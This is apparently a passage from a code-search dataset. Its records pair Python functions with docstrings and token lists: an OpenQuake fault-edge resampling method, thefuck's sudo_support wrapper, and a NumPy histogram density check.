[ "Gives", "emprical", "PDF", "like", "np", ".", "histogram", "(", "....", "density", "=", "True", ")" ]
python
train
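The formula is counts / (bin width * total count); a standalone check against NumPy's own density option, assuming .n in the class is the total event count:

import numpy as np

data = np.random.default_rng(0).normal(size=1000)
counts, edges = np.histogram(data, bins=20)
density = counts.astype(float) / (np.diff(edges) * counts.sum())
reference, _ = np.histogram(data, bins=20, density=True)
assert np.allclose(density, reference)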
gem/oq-engine
openquake/hazardlib/geo/surface/base.py
https://github.com/gem/oq-engine/blob/8294553a0b8aba33fd96437a35065d03547d0040/openquake/hazardlib/geo/surface/base.py#L342-L375
def get_resampled_top_edge(self, angle_var=0.1):
    """
    This method computes a simplified representation of a fault top edge
    by removing the points that are not describing a change of
    direction, provided a certain tolerance angle.

    :param float angle_var:
        Number representing the maximum deviation (in degrees) admitted
        without the creation of a new segment
    :returns:
        A :class:`~openquake.hazardlib.geo.line.Line` representing the
        rupture surface's top edge.
    """
    mesh = self.mesh
    top_edge = [Point(mesh.lons[0][0], mesh.lats[0][0], mesh.depths[0][0])]

    for i in range(len(mesh.triangulate()[1][0]) - 1):
        # NB: mesh.triangulate() is recomputed on each of these calls;
        # hoisting it out of the loop would avoid the repeated work.
        v1 = numpy.asarray(mesh.triangulate()[1][0][i])
        v2 = numpy.asarray(mesh.triangulate()[1][0][i + 1])
        cosang = numpy.dot(v1, v2)
        sinang = numpy.linalg.norm(numpy.cross(v1, v2))
        angle = math.degrees(numpy.arctan2(sinang, cosang))

        if abs(angle) > angle_var:
            top_edge.append(Point(mesh.lons[0][i + 1],
                                  mesh.lats[0][i + 1],
                                  mesh.depths[0][i + 1]))

    top_edge.append(Point(mesh.lons[0][-1], mesh.lats[0][-1], mesh.depths[0][-1]))
    line_top_edge = Line(top_edge)

    return line_top_edge
[ "def", "get_resampled_top_edge", "(", "self", ",", "angle_var", "=", "0.1", ")", ":", "mesh", "=", "self", ".", "mesh", "top_edge", "=", "[", "Point", "(", "mesh", ".", "lons", "[", "0", "]", "[", "0", "]", ",", "mesh", ".", "lats", "[", "0", "]", "[", "0", "]", ",", "mesh", ".", "depths", "[", "0", "]", "[", "0", "]", ")", "]", "for", "i", "in", "range", "(", "len", "(", "mesh", ".", "triangulate", "(", ")", "[", "1", "]", "[", "0", "]", ")", "-", "1", ")", ":", "v1", "=", "numpy", ".", "asarray", "(", "mesh", ".", "triangulate", "(", ")", "[", "1", "]", "[", "0", "]", "[", "i", "]", ")", "v2", "=", "numpy", ".", "asarray", "(", "mesh", ".", "triangulate", "(", ")", "[", "1", "]", "[", "0", "]", "[", "i", "+", "1", "]", ")", "cosang", "=", "numpy", ".", "dot", "(", "v1", ",", "v2", ")", "sinang", "=", "numpy", ".", "linalg", ".", "norm", "(", "numpy", ".", "cross", "(", "v1", ",", "v2", ")", ")", "angle", "=", "math", ".", "degrees", "(", "numpy", ".", "arctan2", "(", "sinang", ",", "cosang", ")", ")", "if", "abs", "(", "angle", ")", ">", "angle_var", ":", "top_edge", ".", "append", "(", "Point", "(", "mesh", ".", "lons", "[", "0", "]", "[", "i", "+", "1", "]", ",", "mesh", ".", "lats", "[", "0", "]", "[", "i", "+", "1", "]", ",", "mesh", ".", "depths", "[", "0", "]", "[", "i", "+", "1", "]", ")", ")", "top_edge", ".", "append", "(", "Point", "(", "mesh", ".", "lons", "[", "0", "]", "[", "-", "1", "]", ",", "mesh", ".", "lats", "[", "0", "]", "[", "-", "1", "]", ",", "mesh", ".", "depths", "[", "0", "]", "[", "-", "1", "]", ")", ")", "line_top_edge", "=", "Line", "(", "top_edge", ")", "return", "line_top_edge" ]
This method computes a simplified representation of a fault top edge by
removing the points that are not describing a change of direction,
provided a certain tolerance angle.

:param float angle_var:
    Number representing the maximum deviation (in degrees) admitted
    without the creation of a new segment
:returns:
    A :class:`~openquake.hazardlib.geo.line.Line` representing the
    rupture surface's top edge.
[ "This", "methods", "computes", "a", "simplified", "representation", "of", "a", "fault", "top", "edge", "by", "removing", "the", "points", "that", "are", "not", "describing", "a", "change", "of", "direction", "provided", "a", "certain", "tolerance", "angle", "." ]
python
train
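The direction-change test is just the angle between successive edge vectors, computed magnitude-independently via atan2(|v1 x v2|, v1 . v2). In isolation, with made-up vectors:

import math
import numpy as np

v1 = np.array([1.0, 0.0, 0.0])   # stand-ins for mesh.triangulate() output
v2 = np.array([1.0, 0.2, 0.0])
cosang = np.dot(v1, v2)
sinang = np.linalg.norm(np.cross(v1, v2))
angle = math.degrees(np.arctan2(sinang, cosang))
print(round(angle, 1), angle > 0.1)   # ~11.3 degrees -> a new top-edge point is kept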
nvbn/thefuck
thefuck/specific/sudo.py
https://github.com/nvbn/thefuck/blob/40ab4eb62db57627bff10cf029d29c94704086a2/thefuck/specific/sudo.py#L6-L18
# In thefuck this function is wrapped with the `decorator` package,
# hence the (fn, command) signature.
def sudo_support(fn, command):
    """Removes sudo before calling fn and adds it after."""
    if not command.script.startswith('sudo '):
        return fn(command)

    result = fn(command.update(script=command.script[5:]))

    if result and isinstance(result, six.string_types):
        return u'sudo {}'.format(result)
    elif isinstance(result, list):
        return [u'sudo {}'.format(x) for x in result]
    else:
        return result
[ "def", "sudo_support", "(", "fn", ",", "command", ")", ":", "if", "not", "command", ".", "script", ".", "startswith", "(", "'sudo '", ")", ":", "return", "fn", "(", "command", ")", "result", "=", "fn", "(", "command", ".", "update", "(", "script", "=", "command", ".", "script", "[", "5", ":", "]", ")", ")", "if", "result", "and", "isinstance", "(", "result", ",", "six", ".", "string_types", ")", ":", "return", "u'sudo {}'", ".", "format", "(", "result", ")", "elif", "isinstance", "(", "result", ",", "list", ")", ":", "return", "[", "u'sudo {}'", ".", "format", "(", "x", ")", "for", "x", "in", "result", "]", "else", ":", "return", "result" ]
Removes sudo before calling fn and adds it after.
[ "Removes", "sudo", "before", "calling", "fn", "and", "adds", "it", "after", "." ]
python
train
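Behavior sketch for sudo_support: Command below is a minimal stand-in with only the fields the wrapper touches (the real class lives in thefuck.types), and the rule function is hypothetical.

class Command:
    def __init__(self, script):
        self.script = script

    def update(self, script):
        return Command(script)

def get_new_command(command):          # a typical thefuck rule function
    return command.script.replace('aptget', 'apt-get')

print(sudo_support(get_new_command, Command('sudo aptget update')))
# -> 'sudo apt-get update'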